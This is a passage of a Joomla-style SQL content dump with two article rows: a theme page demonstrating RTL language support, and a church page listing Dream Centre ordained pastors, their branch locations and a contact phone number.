(100, 282, 'RTL Language Ready', 'rtl-language-ready', '<p>This theme comes with RTL Language support.</p>\r\n<p><br /> [grid] [column size=\"1-2\"] <img src=\"images/demo/colors/1-ltr.png\" alt=\"Left to Right\" width=\"410\" height=\"782\" /> [/column] [column size=\"1-2\"] <img src=\"images/demo/colors/1-rtl.png\" alt=\"Right to Left\" width=\"410\" height=\"779\" /> [/column] [/grid]</p>', '', 1, 2, '2014-08-05 13:59:20', 196, '', '2015-12-18 10:18:52', 42, 0, '0000-00-00 00:00:00', '2014-08-05 13:59:20', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 12, 9, '', '', 1, 453, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(101, 307, 'Dream Centre Ordained Pastors', 'ordained-pastor', '<h2><strong>To contact any of our pastors please call: 09090003891</strong></h2>\r\n<table style=\"width: 716px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><strong>Name</strong></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><strong>Location</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr Dayo OWOEYE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Travelling Minister</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Biodun AKINYEMI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Travelling Minister</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Lekan AWE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Travelling Minister</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor  Dr Lekan OJO</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre, Bayduk,  Akure</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor  Dr Soji OLOYEDE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>The Dream Centre, Behind AP Filling Station, Oronna, Modakeke - Ife</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor  Dr  Samuel BINUOMOTE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Travelling Minister</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Seun KOLAPO</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Travelling Minister</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor  Dr  Sogo ADEDIRAN</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre,  London</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Kehinde ODENIYI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre,  Online Church</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Seun AKINYEMI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Travelling Minister and Pastor in Charge, Headquarters Buildings Projects</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Gbenga ABE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre, Concord, Ilesha</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Niyi SOBOWA LE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Travelling Minister</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Segun ADETUNJI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Travelling Minister</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr Charles ABIONA</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre, Oyo</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Joshua AREOGUN</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre,  London</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Tunde OGUNKOYA</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre,  Abuja</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Wale OLANSEBE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre,  Port-Harcourt</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Tomiwa AKINTUNDE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre I Ilorin.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Niyi AKINDOYIN</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre, Bodija Ibadan</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor  Kayode OLORUNNISOLA</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre, LG Shopping Complex, 63, Lawanson road, Zamba bus Stop, Itire,  Surulere</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Muyiwa OLATUNJI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre,  10, Segun Irefin Street, Off LASU- Isheri road, by old Garage Bus Stop. Isheri – Idimu.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Toba ABE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre, 2nd floor, 35 Benson Bus Stop, Opposite Fidelity Bank, Lagos- Ikorodu Road, Ikorodu</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Seyi OLUWATUYI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre,  10, Segun Irefin Street, Off LASU- Isheri road, by old Garage Bus Stop. Isheri – Idimu.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor David ALABI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre II Ilorin.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dayo AFOLABI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Married men Church, HQ</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Tope BINUOMOTE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre  Ogbomoso</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Niyi ADENUGA</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>The Dream Centre, Road 7, Ile-Ife</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Cleopas IBIKUNLE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre  I, Osogbo</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Samuel OLALERE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Single Brothers Church, HQ.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Enitan EGBEYEMI.</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre,  Apata, Ibadan</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Michael ADEMOLU</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre, Aja</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Ademola ADEKANMI.</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre,  Akobo, Ibadan</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Rufus OYEDELE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre,  Abeokuta</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr Anthony OLASINDE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>DC Owo, Ondo State</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Deola MUSA</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre,  Ilorin</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Sunday ISRAEL</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre  Ayeso, Ilesa.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Yinka OYAYODE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre HQ</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Tolu OYEWO</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre HQ</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Lanre OLAYEMI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre HQ</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Laolu ONIYA</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre HQ</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Ojo DAVID</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre Agunbelewo, Osogbo</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Kunle OMOOTEMI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre Children Church, HQ</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Tunde OLAJOLO</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre Social Activities, HQ</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Ife OMONIJO</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre  HQ</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Kayode ODEWUMI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre  HQ</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Tobi ADEWUYI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre Lagos</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Deji OGUNGBEMI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre  HQ</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Joel AKINKUNMI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre  II (Capital, Osogbo )</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Tunji ADEDOKUN</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre, Agunbelewo, Osogbo</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Micheal OGUNDARE</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre, Ikirun</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Femi SARUMI</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre, 2nd Floor, Old Custom Building, Ajipowo Junction, Along Ondo Road, Akure</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p>Pastor Dr. Funmi Oloyede</p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre Orona, Ife.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\">Pastor Tosin Daramola</span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\">Dream Centre Ejigbo</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Kuye Adeniyi</span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p>Dream Centre Single Sisters Workers Church, HQ</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Dr. Christopher  Akinbile</span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\">Dream Centre, 16 Oluwatuyi Quarters, Akure</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Biodun Adegbite</span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\">Dream Centre Ikeja, Lagos</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Dayo Amusan</span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Dream Centre OAUTHC, Ile-Ife</span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Seun Ojo</span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Dream Centre Isolo, Lagos</span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Olaniyi Bamikole</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 14px; color: #333333;\">Dream Centre </span>Sattellite Town, Lagos</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Sadare Lawrence</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Dream Centre HQ, Osogbo</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Mathew Adebiyi</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Dream Centre 2, Osogbo</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Toyin Olasebe</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Dream Centre, Porthacourt</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Temilolu Shaibu</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Dream Centre Fola Agoro, Lagos</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Kemi Oluwatuyi</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Dream Centre Isheri, Lagos</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Tosin Kizito Adejumo</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span 